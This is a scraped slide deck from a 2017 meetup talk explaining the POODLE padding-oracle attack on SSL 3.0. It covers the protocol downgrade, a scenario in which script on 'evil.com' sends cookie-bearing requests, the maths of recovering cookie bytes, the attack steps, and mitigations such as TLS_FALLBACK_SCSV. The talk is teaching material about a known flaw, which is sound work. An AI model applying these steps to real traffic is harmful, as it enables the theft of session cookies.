Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.


341 vues

Publié le

Null Meet Talk 18/3/2017

Publié dans : Ingénierie
  • Identifiez-vous pour voir les commentaires

  • Soyez le premier à aimer ceci


  1. 1. POODLE This POODLE Bites: Exploiting The SSL 3.0 Fallback Bodo Möller, Thai Duong, Krzysztof Kotowicz Presented By: Samit Anwer
  2. 2. Padding Oracle On Downgraded Legacy Encryption • If attacker interferes with a handshake offering TLS 1.0 or later, clients will downgrade to SSL 3.0 • Encryption in SSL 3.0 uses either the RC4 stream cipher or a block cipher (AES/DES) in CBC mode • We will be taking a running example of AES in CBC mode of operation • Assumption: • the attacker can modify network transmissions between client and server
  3. 3. • Attacker sends link to victim (http://evil.com) • When victim visits the link, the Javascript embedded on evil.com starts making cookie bearing requests to https://example.com A HTTP request looks like: POST /path Cookie: name=value...rnrn body • The attacker can MITM the encrypted traffic and attacker controls data in “path” and “body”. Attack Scenario
  4. 4. POST /path Cookie: name=value...rnrnbody ‖ 20byte MAC ‖ padding C1 C2 Ci Cn-1 Cn P1 P2 Pi Pn-1 Pn Pi Pn P1 CiC1 Cn Ci = EK(Pi Ꚛ Ci-1) C0 = IV Cipher Block Chaining Encryption EnCt29642a9666ee9dbc8c0306acacb63bf8dcf2c554d9642a9666ee9dbc8c0306acae2n1AGm0vgFHgpMKrFgwdWAEF AES block size is 16 bytes DES block size is 8 bytes
  5. 5. Cipher Block Chaining Decryption Pi = DK(Ci) Ꚛ Ci-1 C0 = IV C1 CnCi P1 Pi Pn C1 C2 Ci Cn-1 Cn P1 P2 Pi Pn-1 Pn POST /path Cookie: name=value...rnrnbody ‖ 20byte MAC ‖ padding EnCt29642a9666ee9dbc8c0306acacb63bf8dcf2c554d9642a9666ee9dbc8c0306acae2n1AGm0vgFHgpMKrFgwdWAEF Back
  6. 6. POST /path Cookie: sessionid=value...rnrnbody ‖ 20byte MAC ‖ padding Padding of 1 to L bytes (where L is the block size in bytes) is added before performing blockwise CBC The attacker controls the request path & request body & hence can forge requests such that: 1. The padding fills an entire block (encrypted into Cn). 2. The cookie’s first (as of yet unknown) byte appears as the final byte in an earlier block (which gets encrypted into Ci). • The attacker replaces Cn by any earlier ciphertext block Ci • the ciphertext will be accepted if DK(Ci) ⊕ Cn-1 happens to have 15 as its final byte, • otherwise, it will be rejected  giving rise to a padding oracle attack The attack Ci Cn
  7. 7. Attack Contd. Assuming L=16 (AES) and ciphertext gets accepted: From (a): 15 = DK(Ci) [15] ⊕ Cn-1[15] , which can be written as => DK(Ci) [15] = 15 ⊕ Cn-1[15] --------- (1) We know: Pi = DK(Ci) ⊕ Ci-1 and hence Pi[15] = DK(Ci) [15] ⊕ Ci-1[15] --------- (2) By replacing DK(Ci) [15] from (1) in (2) we get Pi[15] = 15 ⊕ Cn-1[15] ⊕ Ci-1[15] Unknown entity Known entity C1 Cn /CiCn-1 P1 Pn-1 Pn From CBC decryption (here) we know: Pi = DK(Ci) Ꚛ Ci-1  Pn = DK(Cn) Ꚛ Cn-1  Pn[15] = DK(Cn)[15] Ꚛ Cn-1[15] ----- (a) C1 C2 Ci Cn-1 Cn/Ci DK(Cn /Ci)
  8. 8. Overall Effort • 256 SSL 3.0 requests per byte Recommendation • disabling the SSL 3.0 protocol in the client or in the server or both • TLS_FALLBACK_SCSV • when an incoming connection includes 0x56, 0x00 (TLS_FALLBACK_SCSV) in ClientHello.cipher_suites, compare ClientHello.client_version to the highest protocol version supported by the server. If the server supports a version higher than the one indicated by the client, reject the connection Problem with SSL 3.0 in CBC mode: The integrity of padding cannot be verified when decrypting as it is not covered by the MAC
  9. 9. Demo Overview src: https://patzke.org/implementing-the-poodle-attack.html
  10. 10. Attack Steps: • Degrade TLS protocol usage to SSLv3 by disruption of TLS handshake attempts. • Justify the URL and POST length such that the last block of the ciphertext is padding. • Perform the copy operation on every generated TLS packet and calculate the leaked byte if the server accepts the modified packet.
  11. 11. References • This POODLE Bites: Exploiting The SSL 3.0 Fallback Bodo Möller, Thai Duong, Krzysztof Kotowicz https://www.openssl.org/~bodo/ssl-poodle.pdf • Attack of the week: POODLE, https://blog.cryptographyengineering.com/2014/10/15/attack-of- week-poodle/ • Implementing the POODLE Attack, https://patzke.org/implementing-the-poodle-attack.html